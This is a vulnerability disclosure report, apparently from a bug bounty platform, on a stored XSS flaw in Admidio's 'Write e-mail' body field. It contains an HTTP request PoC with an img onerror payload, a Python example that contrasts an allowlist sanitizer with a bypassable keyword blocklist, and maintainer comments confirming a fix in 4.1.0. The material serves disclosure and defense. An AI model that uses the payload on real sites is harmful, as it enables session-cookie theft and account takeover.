Cross-site Scripting (XSS) - Stored in admidio/admidio


Reported on

Sep 28th 2021


Stored XSS in parameter 'msg_body' at 'Write e-mail' allows for the arbitrary execution of JavaScript

Proof of Concept

// PoC.req
POST /demo/adm_program/modules/messages/messages_send.php HTTP/2
Cookie: ADMIDIO_DEMO_d00c3e23_demo_SESSION_ID=93c01fc78b67c3dd8e8ce86ae139a396; 'ADMIDIO_DEMO_d00c3e23_demo_cookieconsent_status=dismiss
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23765900513111934937891624423
Content-Length: 720
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="msg_to[]"

groupID: 4
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="subject"

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="MAX_FILE_SIZE"

-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="msg_body"

<p>&lt;iMg SrC=&quot;x&quot; oNeRRor=&quot;alert(1);&quot;&gt;</p>
-----------------------------23765900513111934937891624423
Content-Disposition: form-data; name="btn_send"

-----------------------------23765900513111934937891624423--

Steps to Reproduce

Go to News > Write e-mail

In the body field, enter the payload: <iMg SrC="x" oNeRRor="alert(1);">

The XSS triggers when the e-mail detail view is opened.


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
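Added example, not part of this report or of Admidio's own (PHP) code: a Python allowlist sanitizer applied to the msg_body value from the PoC, next to a case-sensitive blocklist that the mixed-case oNeRRor attribute slips past. The constructed SUBMITTED_MSG_BODY, the tag/attribute allowlist and the assumption that the application entity-decodes the editor's input once before rendering are mine.

```python
import html
from html.parser import HTMLParser

# Constructed from the PoC: msg_body arrives entity-encoded inside <p>; the app is assumed to decode it once before rendering.
SUBMITTED_MSG_BODY = '<p>&lt;iMg SrC=&quot;x&quot; oNeRRor=&quot;alert(1);&quot;&gt;</p>'

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}            # no img/src, style or on* attributes anywhere
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")

class AllowlistSanitizer(HTMLParser):      # keeps only allowlisted tags/attributes; text is re-escaped
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):  # HTMLParser lowercases tag and attribute names
        if tag not in ALLOWED_TAGS:
            return                          # unknown element (here: img) is dropped entirely
        kept = []
        for name, value in attrs:
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, set()):
                continue                    # event handlers never survive, whatever their case
            if name == "href" and not (value or "").lower().startswith(SAFE_URL_SCHEMES):
                continue                    # rejects javascript: and data: URLs
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))

def sanitize_msg_body(raw, entity_decode_passes=1):
    """Decode the editor's entities as the app does, then sanitize before storing or rendering."""
    body = raw
    for _ in range(entity_decode_passes):
        body = html.unescape(body)
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)

def naive_blocklist_filter(raw):
    """Case-sensitive blocklist, for contrast: the mixed-case payload walks straight past it."""
    body = html.unescape(raw)
    for bad in ("<script", "onerror", "onload"):
        body = body.replace(bad, "")
    return body
```

For the PoC body the allowlist yields an empty paragraph, while the blocklist returns the img tag with its handler intact.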

We have contacted a member of the admidio team and are waiting to hear back a year ago
admidio/admidio maintainer validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
admidio/admidio maintainer
a year ago


The problem is solved within the current master. If I solve the CSRF within the forms we will release version 4.1 which will address this issue.

a year ago


OK. I am waiting for the new version from you.

Markus Faßbender marked this as fixed in 4.1.0 with commit eec453 a year ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE
a year ago


Thanks for the research.
